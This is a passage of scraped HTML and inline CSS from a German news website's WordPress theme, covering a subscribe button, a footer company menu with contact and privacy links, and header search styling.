wpb_column vc_column_container tdc-column td-pb-span6">
  455. <style scoped>.tdi_40{vertical-align:baseline}.tdi_40>.wpb_wrapper,.tdi_40>.wpb_wrapper>.tdc-elements{display:block}.tdi_40>.wpb_wrapper>.tdc-elements{width:100%}.tdi_40>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_40>.wpb_wrapper{width:auto;height:auto}.tdi_40{padding-top:30px!important;padding-right:40px!important;padding-bottom:40px!important;padding-left:40px!important;width:40%!important;justify-content:center!important;text-align:center!important;position:relative}@media (min-width:1019px) and (max-width:1140px){.tdi_40{padding-top:20px!important;padding-right:30px!important;padding-bottom:30px!important;padding-left:30px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_40{padding-top:10px!important;padding-right:20px!important;padding-bottom:25px!important;padding-left:20px!important}}@media (max-width:767px){.tdi_40{margin-bottom:30px!important;width:100%!important}}</style>
  456. <div class="tdi_39_rand_style td-element-style" ><style>.tdi_39_rand_style{background-color:#ec3535!important}</style></div><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_column_title tdi_41 tdm-content-horiz-center td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_41" >
  457. <style>.tdi_41{margin-bottom:10px!important}@media (min-width:768px) and (max-width:1018px){.tdi_41{margin-bottom:5px!important}}</style>
  458. <style>.tdm_block_column_title{margin-bottom:0;display:inline-block;width:100%}</style><div class="td-block-row"><div class="td-block-span12 tdm-col">
  459. <style>body .tdc-row .tdi_42 .tdm-title{color:#ffffff}.tdc-row .tdi_42 .tdm-title{font-family:Work Sans!important;font-size:24px!important;line-height:1.1!important;font-weight:700!important}@media (min-width:768px) and (max-width:1018px){.tdc-row .tdi_42 .tdm-title{font-size:18px!important}}</style><div class="tds-title tds-title1 td-fix-index tdi_42 "><h6 class="tdm-title tdm-title-sm">Nachrichtenmorgen.De</h6></div></div></div></div><div class="wpb_wrapper td_block_single_image td_block_wrap  td-animation-stack td_block_wrap vc_single_image tdi_43  td-single-image- td-pb-border-top td_block_template_1 "  data-td-block-uid="tdi_43"><span
  460.                            class="td_single_image_bg td-lazy-img"
  461.                            data-type="css_image"
  462.                            data-img-url=""  ></span>
  463. <style>.tdi_43{margin-right:auto!important;margin-bottom:30px!important;margin-left:auto!important}@media (min-width:768px) and (max-width:1018px){.tdi_43{margin-bottom:20px!important}}</style>
  464. <style>.td_block_single_image.td-image-video-modal{cursor:pointer}.td_block_single_image .td_single_image_bg{display:block}.td_block_single_image.td-no-img-custom-url .td_single_image_bg{pointer-events:none;cursor:default}.vc_single_image a{position:relative}.td-single-image-style-rounded .td_single_image_bg,.td-single-image-style-rounded .td_single_image_bg:before,.td-single-image-style-rounded .td_single_image_bg:after{border-radius:4px}.td-single-image-style-border,.td-single-image-style-round-border,.td-single-image-style-circle-border,.td-single-image-style-outline,.td-single-image-style-bordered-shadow,.td-single-image-style-round-outline,.td-single-image-style-round-border-shadow,.td-single-image-style-circle-outline,.td-single-image-style-circle-border-shadow{margin-bottom:22px;background-color:#EBEBEB}.td-single-image-style-border,.td-single-image-style-round-border,.td-single-image-style-circle-border{padding:6px}.td-single-image-style-outline,.td-single-image-style-bordered-shadow,.td-single-image-style-round-outline,.td-single-image-style-round-border-shadow,.td-single-image-style-circle-outline,.td-single-image-style-circle-border-shadow{padding:1px}.td-single-image-style-outline .td_single_image_bg:before,.td-single-image-style-bordered-shadow .td_single_image_bg:before,.td-single-image-style-round-outline .td_single_image_bg:before,.td-single-image-style-round-border-shadow .td_single_image_bg:before,.td-single-image-style-circle-outline .td_single_image_bg:before,.td-single-image-style-circle-border-shadow .td_single_image_bg:before,.td-single-image-style-outline a:after,.td-single-image-style-bordered-shadow .td_single_image_bg:after,.td-single-image-style-round-outline .td_single_image_bg:after,.td-single-image-style-round-border-shadow .td_single_image_bg:after,.td-single-image-style-circle-outline .td_single_image_bg:after,.td-single-image-style-circle-border-shadow .td_single_image_bg:after{content:'';position:absolute;top:0;left:0;width:100%;height:100%}.td-single-image-style-outline .td_single_image_bg:after,.td-single-image-style-bordered-shadow .td_single_image_bg:after,.td-single-image-style-round-outline .td_single_image_bg:after,.td-single-image-style-round-border-shadow .td_single_image_bg:after,.td-single-image-style-circle-outline .td_single_image_bg:after,.td-single-image-style-circle-border-shadow .td_single_image_bg:after{color:#fff;-webkit-box-shadow:inset 0px 0px 0px 6px;box-shadow:inset 0px 0px 0px 6px}.td-single-image-style-outline .td_single_image_bg:before,.td-single-image-style-bordered-shadow .td_single_image_bg:before,.td-single-image-style-round-outline .td_single_image_bg:before,.td-single-image-style-round-border-shadow .td_single_image_bg:before,.td-single-image-style-circle-outline .td_single_image_bg:before,.td-single-image-style-circle-border-shadow .td_single_image_bg:before{color:#EBEBEB;-webkit-box-shadow:inset 0px 0px 0px 7px;box-shadow:inset 0px 0px 0px 7px}.td-single-image-style-shadow .td_single_image_bg,.td-single-image-style-bordered-shadow .td_single_image_bg,.td-single-image-style-round-shadow .td_single_image_bg,.td-single-image-style-round-border-shadow .td_single_image_bg,.td-single-image-style-circle-shadow .td_single_image_bg,.td-single-image-style-circle-border-shadow .td_single_image_bg{-webkit-box-shadow:0 0 6px rgba(0,0,0,0.1);box-shadow:0 0 6px rgba(0,0,0,0.1)}.td-single-image-style-3d-shadow{position:relative}.td-single-image-style-3d-shadow:before,.td-single-image-style-3d-shadow:after{content:'';position:absolute;bottom:0;height:30%;-webkit-box-shadow:0 15px 10px rgba(0,0,0,0.6);box-shadow:0 15px 10px rgba(0,0,0,0.6);z-index:0}.td-single-image-style-3d-shadow:before{left:5px;right:50%;-webkit-transform:skewY(-6deg);transform:skewY(-6deg);-webkit-transform-origin:0 0;transform-origin:0 0}.td-single-image-style-3d-shadow:after{left:50%;right:5px;-webkit-transform:skewY(6deg);transform:skewY(6deg);-webkit-transform-origin:100% 0;transform-origin:100% 0}.td-single-image-style-3d-shadow .td_single_image_bg{z-index:1}.td-single-image-style-round,.td-single-image-style-round-border,.td-single-image-style-round-outline,.td-single-image-style-round-shadow,.td-single-image-style-round-border-shadow,.td-single-image-style-circle,.td-single-image-style-circle-border,.td-single-image-style-circle-outline,.td-single-image-style-circle-shadow,.td-single-image-style-circle-border-shadow{border-radius:50%}.td-single-image-style-round .td_single_image_bg,.td-single-image-style-round-border .td_single_image_bg,.td-single-image-style-round-outline .td_single_image_bg,.td-single-image-style-round-shadow .td_single_image_bg,.td-single-image-style-round-border-shadow .td_single_image_bg,.td-single-image-style-circle .td_single_image_bg,.td-single-image-style-circle-border .td_single_image_bg,.td-single-image-style-circle-outline .td_single_image_bg,.td-single-image-style-circle-shadow .td_single_image_bg,.td-single-image-style-circle-border-shadow .td_single_image_bg,.td-single-image-style-round .td_single_image_bg:before,.td-single-image-style-round-border .td_single_image_bg:before,.td-single-image-style-round-outline .td_single_image_bg:before,.td-single-image-style-round-shadow .td_single_image_bg:before,.td-single-image-style-round-border-shadow .td_single_image_bg:before,.td-single-image-style-circle .td_single_image_bg:before,.td-single-image-style-circle-border .td_single_image_bg:before,.td-single-image-style-circle-outline .td_single_image_bg:before,.td-single-image-style-circle-shadow .td_single_image_bg:before,.td-single-image-style-circle-border-shadow .td_single_image_bg:before,.td-single-image-style-round .td_single_image_bg:after,.td-single-image-style-round-border .td_single_image_bg:after,.td-single-image-style-round-outline .td_single_image_bg:after,.td-single-image-style-round-shadow .td_single_image_bg:after,.td-single-image-style-round-border-shadow .td_single_image_bg:after,.td-single-image-style-circle .td_single_image_bg:after,.td-single-image-style-circle-border .td_single_image_bg:after,.td-single-image-style-circle-outline .td_single_image_bg:after,.td-single-image-style-circle-shadow .td_single_image_bg:after,.td-single-image-style-circle-border-shadow .td_single_image_bg:after{border-radius:50%}.td-single-image-style-round-outline .td_single_image_bg:before,.td-single-image-style-round-border-shadow .td_single_image_bg:before,.td-single-image-style-circle-outline .td_single_image_bg:before,.td-single-image-style-circle-border-shadow .td_single_image_bg:before,.td-single-image-style-round-outline .td_single_image_bg:before:before,.td-single-image-style-round-border-shadow .td_single_image_bg:before:before,.td-single-image-style-circle-outline .td_single_image_bg:before:before,.td-single-image-style-circle-border-shadow .td_single_image_bg:before:before,.td-single-image-style-round-outline .td_single_image_bg:after:before,.td-single-image-style-round-border-shadow .td_single_image_bg:after:before,.td-single-image-style-circle-outline .td_single_image_bg:after:before,.td-single-image-style-circle-border-shadow .td_single_image_bg:after:before,.td-single-image-style-round-outline .td_single_image_bg:after,.td-single-image-style-round-border-shadow .td_single_image_bg:after,.td-single-image-style-circle-outline .td_single_image_bg:after,.td-single-image-style-circle-border-shadow .td_single_image_bg:after,.td-single-image-style-round-outline .td_single_image_bg:before:after,.td-single-image-style-round-border-shadow .td_single_image_bg:before:after,.td-single-image-style-circle-outline .td_single_image_bg:before:after,.td-single-image-style-circle-border-shadow .td_single_image_bg:before:after,.td-single-image-style-round-outline .td_single_image_bg:after:after,.td-single-image-style-round-border-shadow .td_single_image_bg:after:after,.td-single-image-style-circle-outline .td_single_image_bg:after:after,.td-single-image-style-circle-border-shadow .td_single_image_bg:after:after{border-radius:50%}.td-single-image-style-circle .td_single_image_bg,.td-single-image-style-circle-border .td_single_image_bg,.td-single-image-style-circle-outline .td_single_image_bg,.td-single-image-style-circle-shadow .td_single_image_bg,.td-single-image-style-circle-border-shadow .td_single_image_bg{height:0;padding-bottom:100%}.vc_single_image .td_single_image_bg{width:100%;display:block;background-size:cover}.tdi_43 .td_single_image_bg{height:20px;padding-bottom:0;background-repeat:no-repeat;background-position:center top}.tdi_43:hover .td_single_image_bg:before{opacity:0}@media (max-width:767px){.td-stretch-content .td_block_single_image{margin-right:-20px;margin-left:-20px}}@media (max-width:767px){.td-single-image-style-border,.td-single-image-style-round-border,.td-single-image-style-circle-border,.td-single-image-style-outline,.td-single-image-style-bordered-shadow,.td-single-image-style-round-outline,.td-single-image-style-round-border-shadow,.td-single-image-style-circle-outline,.td-single-image-style-circle-border-shadow{margin-bottom:32px}}</style></div><div class="tdm_block td_block_wrap tdm_block_button tdi_44 tdm-block-button-inline tdm-content-horiz-left td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_44"     >
  465. <style>@media (min-width:768px) and (max-width:1018px){.tdi_44{margin-left:6px!important}}</style>
  466. <style>.tdm_block.tdm_block_button{margin-bottom:0}.tdm_block.tdm_block_button .tds-button{line-height:0}.tdm_block.tdm_block_button.tdm-block-button-inline{display:inline-block}.tdm_block.tdm_block_button.tdm-block-button-full,.tdm_block.tdm_block_button.tdm-block-button-full .tdm-btn{display:block}.tdc-row .tdi_44 .tdm-btn{height:auto;padding:12px 14px}@media (min-width:768px) and (max-width:1018px){.tdc-row .tdi_44 .tdm-btn{height:auto;padding:10px 12px}}</style>
  467. <style>body .tdc-row .tdi_45{background-color:#ffffff}body .tdc-row .tdi_45:before{background-color:rgba(255,255,255,0.9)}.tdc-row .tdi_45 .tdm-btn-text,.tdc-row .tdi_45 i{color:#ec3535}.tdc-row .tdi_45 svg{fill:#ec3535}.tdc-row .tdi_45 svg *{fill:inherit}body .tdc-row .tdi_45:hover .tdm-btn-text,body .tdc-row .tdi_45:hover i{color:#000000;-webkit-text-fill-color:unset;background:transparent;transition:none}body .tdc-row .tdi_45:hover svg{fill:#000000}body .tdc-row .tdi_45:hover svg *{fill:inherit}.tdc-row .tdi_45{padding:12px 14px;height:auto;line-height:1;font-family:Work Sans!important;font-size:13px!important;font-weight:600!important;text-transform:uppercase!important;letter-spacing:0.5px!important}.tdc-row .tdi_45,.tdc-row .tdi_45:before{border-radius:3px}@media (min-width:768px) and (max-width:1018px){.tdc-row .tdi_45{padding:10px 12px;height:auto;line-height:1}.tdc-row .tdi_45{font-size:12px!important;letter-spacing:0px!important}}</style><div class="tds-button td-fix-index"><a
  468.                href="plans/"
  469.                 title="Abonniere jetzt"
  470.                class="tds-button1 tdm-btn tdm-btn-sm tdi_45 " ><span class="tdm-btn-text">Abonniere jetzt</span></a></div></div></div></div><div class="vc_column tdi_47  wpb_column vc_column_container tdc-column td-pb-span6">
  471. <style scoped>.tdi_47{vertical-align:baseline}.tdi_47>.wpb_wrapper,.tdi_47>.wpb_wrapper>.tdc-elements{display:block}.tdi_47>.wpb_wrapper>.tdc-elements{width:100%}.tdi_47>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_47>.wpb_wrapper{width:auto;height:auto}.tdi_47{width:60%!important}@media (max-width:767px){.tdi_47{width:100%!important}}</style><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_column_title tdi_48 tdm-content-horiz-left td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_48" >
  472. <style>.tdi_48{margin-bottom:10px!important}</style><div class="td-block-row"><div class="td-block-span12 tdm-col">
  473. <style>body .tdc-row .tdi_49 .tdm-title{color:#000000}.tdc-row .tdi_49 .tdm-title{font-family:Work Sans!important;font-size:32px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}@media (min-width:1019px) and (max-width:1140px){.tdc-row .tdi_49 .tdm-title{font-size:30px!important}}@media (min-width:768px) and (max-width:1018px){.tdc-row .tdi_49 .tdm-title{font-size:26px!important}}</style><div class="tds-title tds-title1 td-fix-index tdi_49 "><h3 class="tdm-title tdm-title-sm">Unternehmen</h3></div></div></div></div><div class="td_block_wrap td_block_list_menu tdi_50 td-blm-display-vertical td-pb-border-top td_block_template_1 widget"  data-td-block-uid="tdi_50" >
  474. <style>.tdi_50{margin-bottom:15px!important}@media (max-width:767px){.tdi_50{margin-bottom:25px!important}}</style>
  475. <style>.td_block_list_menu ul{flex-wrap:wrap;margin-left:12px}.td_block_list_menu ul li{margin-left:0}.td_block_list_menu ul li a{display:flex;margin-left:0}.td_block_list_menu .td-blm-menu-item-txt{display:flex;align-items:center;flex-grow:1}.td_block_list_menu .sub-menu{padding-left:22px}.td_block_list_menu .sub-menu li{font-size:13px}.td_block_list_menu li.current-menu-item>a,.td_block_list_menu li.current-menu-ancestor>a,.td_block_list_menu li.current-category-ancestor>a,.td_block_list_menu li.current-page-ancestor>a{color:var(--td_theme_color,#4db2ec)}.td_block_list_menu .td-blm-sub-icon{display:flex;align-items:center;justify-content:center;margin-left:.6em;padding:0 .6em;transition:transform .2s ease-in-out}.td_block_list_menu .td-blm-sub-icon svg{display:block;width:1em;height:auto}.td_block_list_menu .td-blm-sub-icon svg,.td_block_list_menu .td-blm-sub-icon svg *{fill:currentColor}.td_block_list_menu.td-blm-display-accordion .menu-item-has-children ul{display:none}.td_block_list_menu.td-blm-display-accordion .menu-item-has-children-open>a>.td-blm-sub-icon{transform:rotate(180deg)}.td_block_list_menu.td-blm-display-horizontal ul{display:flex}body .tdc-row .tdi_50 ul{text-align:left;justify-content:flex-start;margin:0px}body .tdc-row .tdi_50 ul li a{justify-content:flex-start}body .tdc-row .tdi_50 .td-blm-menu-item-txt{flex-grow:1}body .tdc-row .tdi_50 ul li{margin-bottom:8px}body .tdc-row .tdi_50 ul li:last-child{margin-bottom:0}body .tdc-row .tdi_50 a,body .tdc-row .tdi_50 .td-blm-sub-icon{color:#000000}body .tdc-row .tdi_50 li.current-menu-item>a,body .tdc-row .tdi_50 li.current-menu-ancestor>a,body .tdc-row .tdi_50 li.current-category-ancestor>a,body .tdc-row .tdi_50 li.current-page-ancestor>a,body .tdc-row .tdi_50 a:hover,body .tdc-row .tdi_50 li.current-menu-item>a>.td-blm-sub-icon,body .tdc-row .tdi_50 li.current-menu-ancestor>a>.td-blm-sub-icon,body .tdc-row .tdi_50 li.current-category-ancestor>a>.td-blm-sub-icon,body .tdc-row .tdi_50 li.current-page-ancestor>a>.td-blm-sub-icon,body .tdc-row .tdi_50 a:hover>.td-blm-sub-icon{color:#ec3535}body .tdc-row .tdi_50 li{font-family:Work Sans!important;font-size:15px!important;line-height:1.6!important;font-weight:500!important}@media (min-width:768px) and (max-width:1018px){body .tdc-row .tdi_50 ul li{margin-bottom:5px}body .tdc-row .tdi_50 ul li:last-child{margin-bottom:0}body .tdc-row .tdi_50 li{font-size:14px!important}}</style><div class="td-block-title-wrap"></div><div id=tdi_50 class="td_block_inner td-fix-index"><div class="menu-td-demo-footer-menu-container"><ul id="menu-td-demo-footer-menu" class="menu"><li id="menu-item-1092" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-1092"><a href="https://nachrichtenmorgen.de/ueber-uns/"><span class="td-blm-menu-item-txt">Über uns!</span></a></li>
  476. <li id="menu-item-1093" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-1093"><a href="https://nachrichtenmorgen.de/kontakt/"><span class="td-blm-menu-item-txt">Kontakt</span></a></li>
  477. <li id="menu-item-1094" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-1094"><a href="https://nachrichtenmorgen.de/datenschutzbestimmungen/"><span class="td-blm-menu-item-txt">Datenschutzbestimmungen</span></a></li>
  478. <li id="menu-item-3265" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-3265"><a href="https://nachrichtenmorgen.de/impressum/"><span class="td-blm-menu-item-txt">Impressum</span></a></li>
  479. </ul></div></div></div></div></div></div></div></div></div></div></div></div></div><div class="td_block_wrap tdb_header_search tdi_51 tdb-header-search-trigger-enabled td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_51" >
  480. <style>@media(min-width:1141px){.tdi_51{display:inline-block!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_51{display:inline-block!important}}@media (min-width:768px) and (max-width:1018px){.tdi_51{display:inline-block!important}}</style>
  481. <style>.tdb_module_header{width:100%;padding-bottom:0}.tdb_module_header .td-module-container{display:flex;flex-direction:column;position:relative}.tdb_module_header .td-module-container:before{content:'';position:absolute;bottom:0;left:0;width:100%;height:1px}.tdb_module_header .td-image-wrap{display:block;position:relative;padding-bottom:70%}.tdb_module_header .td-image-container{position:relative;width:100%;flex:0 0 auto}.tdb_module_header .td-module-thumb{margin-bottom:0}.tdb_module_header .td-module-meta-info{width:100%;margin-bottom:0;padding:7px 0 0 0;z-index:1;border:0 solid #eaeaea;min-height:0}.tdb_module_header .entry-title{margin:0;font-size:13px;font-weight:500;line-height:18px}.tdb_module_header .td-post-author-name,.tdb_module_header .td-post-date,.tdb_module_header .td-module-comments{vertical-align:text-top}.tdb_module_header .td-post-author-name,.tdb_module_header .td-post-date{top:3px}.tdb_module_header .td-thumb-css{width:100%;height:100%;position:absolute;background-size:cover;background-position:center center}.tdb_module_header .td-category-pos-image .td-post-category:not(.td-post-extra-category),.tdb_module_header .td-post-vid-time{position:absolute;z-index:2;bottom:0}.tdb_module_header .td-category-pos-image .td-post-category:not(.td-post-extra-category){left:0}.tdb_module_header .td-post-vid-time{right:0;background-color:#000;padding:3px 6px 4px;font-family:'Open Sans','Open Sans Regular',sans-serif;font-size:10px;font-weight:600;line-height:1;color:#fff}.tdb_module_header .td-excerpt{margin:20px 0 0;line-height:21px}.tdb_module_header .td-read-more{margin:20px 0 0}.tdb_module_search .tdb-author-photo{display:inline-block}.tdb_module_search .tdb-author-photo,.tdb_module_search .tdb-author-photo img{vertical-align:middle}.tdb_module_search .td-post-author-name{white-space:normal}.tdb_header_search{margin-bottom:0;clear:none}.tdb_header_search .tdb-block-inner{position:relative;display:inline-block;width:100%}.tdb_header_search .tdb-search-form{position:relative;padding:20px;border-width:3px 0 0;border-style:solid;border-color:var(--td_theme_color,#4db2ec);pointer-events:auto}.tdb_header_search .tdb-search-form:before{content:'';position:absolute;top:0;left:0;width:100%;height:100%;background-color:#fff}.tdb_header_search .tdb-search-form-inner{position:relative;display:flex;background-color:#fff}.tdb_header_search .tdb-search-form-inner:after{content:'';position:absolute;top:0;left:0;width:100%;height:100%;border:1px solid #e1e1e1;pointer-events:none}.tdb_header_search .tdb-head-search-placeholder{position:absolute;top:50%;transform:translateY(-50%);padding:3px 9px;font-size:12px;line-height:21px;color:#999;-webkit-transition:all 0.3s ease;transition:all 0.3s ease;pointer-events:none}.tdb_header_search .tdb-head-search-form-input:focus+.tdb-head-search-placeholder,.tdb-head-search-form-input:not(:placeholder-shown)~.tdb-head-search-placeholder{opacity:0}.tdb_header_search .tdb-head-search-form-btn,.tdb_header_search .tdb-head-search-form-input{height:auto;min-height:32px}.tdb_header_search .tdb-head-search-form-input{color:#444;flex:1;background-color:transparent;border:0}.tdb_header_search .tdb-head-search-form-input.tdb-head-search-nofocus{color:transparent;text-shadow:0 0 0 #444}.tdb_header_search .tdb-head-search-form-btn{margin-bottom:0;padding:0 15px;background-color:#222222;font-family:'Roboto',sans-serif;font-size:13px;font-weight:500;color:#fff;-webkit-transition:all 0.3s ease;transition:all 0.3s ease;z-index:1}.tdb_header_search .tdb-head-search-form-btn:hover{background-color:var(--td_theme_color,#4db2ec)}.tdb_header_search .tdb-head-search-form-btn i,.tdb_header_search .tdb-head-search-form-btn span{display:inline-block;vertical-align:middle}.tdb_header_search .tdb-head-search-form-btn i{font-size:12px}.tdb_header_search .tdb-head-search-form-btn .tdb-head-search-form-btn-icon{position:relative}.tdb_header_search .tdb-head-search-form-btn .tdb-head-search-form-btn-icon-svg{line-height:0}.tdb_header_search .tdb-head-search-form-btn svg{width:12px;height:auto}.tdb_header_search .tdb-head-search-form-btn svg,.tdb_header_search .tdb-head-search-form-btn svg *{fill:#fff;-webkit-transition:all 0.3s ease;transition:all 0.3s ease}.tdb_header_search .tdb-aj-search-results{padding:20px;background-color:rgba(144,144,144,0.02);border-width:1px 0;border-style:solid;border-color:#ededed;background-color:#fff}.tdb_header_search .tdb-aj-search-results .td_module_wrap:last-child{margin-bottom:0;padding-bottom:0}.tdb_header_search .tdb-aj-search-results .td_module_wrap:last-child .td-module-container:before{display:none}.tdb_header_search .tdb-aj-search-inner{display:flex;flex-wrap:wrap;*zoom:1}.tdb_header_search .tdb-aj-search-inner:before,.tdb_header_search .tdb-aj-search-inner:after{display:table;content:'';line-height:0}.tdb_header_search .tdb-aj-search-inner:after{clear:both}.tdb_header_search .result-msg{padding:4px 0 6px 0;font-family:'Roboto',sans-serif;font-size:12px;font-style:italic;background-color:#fff}.tdb_header_search .result-msg a{color:#222}.tdb_header_search .result-msg a:hover{color:var(--td_theme_color,#4db2ec)}.tdb_header_search .td-module-meta-info,.tdb_header_search .td-next-prev-wrap{text-align:left}.tdb_header_search .td_module_wrap:hover .entry-title a{color:var(--td_theme_color,#4db2ec)}.tdb_header_search .tdb-aj-cur-element .entry-title a{color:var(--td_theme_color,#4db2ec)}.tdc-dragged .tdb-head-search-btn:after,.tdc-dragged .tdb-drop-down-search{visibility:hidden!important;opacity:0!important;-webkit-transition:all 0.3s ease;transition:all 0.3s ease}.tdb-header-search-trigger-enabled{z-index:1000}.tdb-header-search-trigger-enabled .tdb-head-search-btn{display:flex;align-items:center;position:relative;text-align:center;color:var(--td_theme_color,#4db2ec)}.tdb-header-search-trigger-enabled .tdb-head-search-btn:after{visibility:hidden;opacity:0;content:'';display:block;position:absolute;bottom:0;left:0;right:0;margin:0 auto;width:0;height:0;border-style:solid;border-width:0 6.5px 7px 6.5px;-webkit-transform:translate3d(0,20px,0);transform:translate3d(0,20px,0);-webkit-transition:all 0.4s ease;transition:all 0.4s ease;border-color:transparent transparent var(--td_theme_color,#4db2ec) transparent}.tdb-header-search-trigger-enabled .tdb-drop-down-search-open+.tdb-head-search-btn:after{visibility:visible;opacity:1;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}.tdb-header-search-trigger-enabled .tdb-search-icon,.tdb-header-search-trigger-enabled .tdb-search-txt,.tdb-header-search-trigger-enabled .tdb-search-icon-svg svg *{-webkit-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out}.tdb-header-search-trigger-enabled .tdb-search-icon-svg{display:flex;align-items:center;justify-content:center}.tdb-header-search-trigger-enabled .tdb-search-icon-svg svg{height:auto}.tdb-header-search-trigger-enabled .tdb-search-icon-svg svg,.tdb-header-search-trigger-enabled .tdb-search-icon-svg svg *{fill:var(--td_theme_color,#4db2ec)}.tdb-header-search-trigger-enabled .tdb-search-txt{position:relative;line-height:1}.tdb-header-search-trigger-enabled .tdb-drop-down-search{visibility:hidden;opacity:0;position:absolute;top:100%;left:0;-webkit-transform:translate3d(0,20px,0);transform:translate3d(0,20px,0);-webkit-transition:all 0.4s ease;transition:all 0.4s ease;pointer-events:none;z-index:10}.tdb-header-search-trigger-enabled .tdb-drop-down-search-open{visibility:visible;opacity:1;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}.tdb-header-search-trigger-enabled .tdb-drop-down-search-inner{position:relative;max-width:300px;pointer-events:all}.rtl .tdb-header-search-trigger-enabled .tdb-drop-down-search-inner{margin-left:0;margin-right:auto}.tdb_header_search .tdb-aj-srs-title{margin-bottom:10px;font-family:'Roboto',sans-serif;font-weight:500;font-size:13px;line-height:1.3;color:#888}.tdb_header_search .tdb-aj-sr-taxonomies{display:flex;flex-direction:column}.tdb_header_search .tdb-aj-sr-taxonomy{font-family:'Roboto',sans-serif;font-size:13px;font-weight:500;line-height:18px;color:#111}.tdb_header_search .tdb-aj-sr-taxonomy:not(:last-child){margin-bottom:5px}.tdb_header_search .tdb-aj-sr-taxonomy:hover{color:var(--td_theme_color,#4db2ec)}.tdi_51 .tdb-head-search-btn i{font-size:17px;width:34px;height:34px;line-height:34px;color:#000000}.tdi_51 .tdb-head-search-btn svg{width:17px}.tdi_51 .tdb-search-icon-svg{width:34px;height:34px}.tdi_51 .tdb-search-txt{top:0px;font-family:Work Sans!important;font-size:14px!important;line-height:3!important;font-weight:600!important}.tdi_51 .tdb-drop-down-search-inner{left:-96px;box-shadow:0px 2px 16px 0px rgba(0,0,0,0.09)}.tdi_51 .tdb-drop-down-search .tdb-drop-down-search-inner{max-width:900px}.tdi_51 .tdb-search-form{border-width:0px}.tdi_51 .tdb-head-search-form-input:focus+.tdb-head-search-placeholder,.tdb-head-search-form-input:not(:placeholder-shown)~.tdb-head-search-placeholder{top:-63%;transform:translateY(0)}.tdi_51 .tdb-head-search-form-btn-icon{top:0px}.tdi_51 .tdb-aj-search-results{padding:25px 20px;border-width:0px}.tdi_51 .result-msg{text-align:center;font-family:Work Sans!important;font-size:12px!important;font-style:normal!important;font-weight:600!important;text-transform:uppercase!important}.tdi_51 .tdb-head-search-btn svg,.tdi_51 .tdb-head-search-btn svg *{fill:#000000}.tdi_51 .tdb-head-search-btn:hover i{color:#ec3535}.tdi_51 .tdb-head-search-btn:hover svg,.tdi_51 .tdb-head-search-btn:hover svg *{fill:#ec3535}.tdi_51 .tdb-head-search-btn .tdb-search-txt{color:#000000}.tdi_51 .tdb-head-search-btn:hover .tdb-search-txt{color:#ec3535}.tdi_51 .tdb-head-search-btn:after{border-bottom-color:#ffffff}.tdi_51 .tdb-head-search-form-btn:hover{color:#ffffff;background-color:#000000}.tdi_51 .tdb-head-search-form-btn:hover svg,.tdi_51 .tdb-head-search-form-btn:hover svg *{fill:#ffffff}.tdi_51 .tdb-head-search-form-btn{background-color:#ec3535}.tdi_51 .result-msg,.tdi_51 .result-msg a{color:#ec3535}.tdi_51 .result-msg a:hover{color:#000000}.tdi_51 .tdb-head-search-form-input{font-family:Work Sans!important;font-size:14px!important}.tdi_51 .tdb-head-search-placeholder{font-family:Work Sans!important;font-size:14px!important}.tdi_51 .td_module_wrap{width:50%;float:left;padding-left:10px;padding-right:10px;padding-bottom:10px;margin-bottom:10px}.tdi_51 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0;padding-bottom:0}.tdi_51 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none}.tdi_51 .tdb-aj-search-inner{margin-left:-10px;margin-right:-10px}.tdi_51 .td-module-container:before{bottom:-10px;border-color:#eaeaea}.tdi_51 .td-module-container{border-color:#eaeaea;flex-direction:row;align-items:center}.tdi_51 .entry-thumb{background-position:center 50%}.tdi_51 .td-image-container{flex:0 0 30%;width:30%;display:block;order:0}.ie10 .tdi_51 .td-image-container,.ie11 .tdi_51 .td-image-container{flex:0 0 auto}.ie10 .tdi_51 .td-module-meta-info,.ie11 .tdi_51 .td-module-meta-info{flex:1}.tdi_51 .td-post-vid-time{display:block}.tdi_51 .td-module-meta-info{padding:0 0 0 12px;border-color:#eaeaea}.tdi_51 .entry-title{margin:0 0 10px 0;font-family:PT Serif!important;font-size:15px!important;line-height:1.2!important;font-weight:600!important}.tdi_51 .td-excerpt{column-count:1;column-gap:48px;display:none}.tdi_51 .td-post-category{margin:0 5px 0 0;padding:3px 0;background-color:rgba(255,255,255,0);color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;text-transform:uppercase!important}.tdi_51 .td-read-more{display:none}.tdi_51 .td-author-date{display:inline}.tdi_51 .td-post-author-name{display:none}.tdi_51 .entry-review-stars{display:none}.tdi_51 .td-icon-star,.tdi_51 .td-icon-star-empty,.tdi_51 .td-icon-star-half{font-size:15px}.tdi_51 .td-module-comments{display:none}.tdi_51 .tdb-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_51 .td-post-category:hover{background-color:rgba(255,255,255,0)!important;color:#000000}.tdi_51 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}body .tdi_51 .td_module_wrap:hover .td-module-title a,.tdi_51 .tdb-aj-cur-element .entry-title a{color:#ec3535!important}.tdi_51 .td-editor-date,.tdi_51 .td-editor-date .td-post-author-name,.tdi_51 .td-module-comments a{font-family:Work Sans!important;font-size:12px!important;line-height:1!important}.tdi_51 .td-module-exclusive .td-module-title a:before{display:inline-block}@media (min-width:768px){.tdi_51 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_51 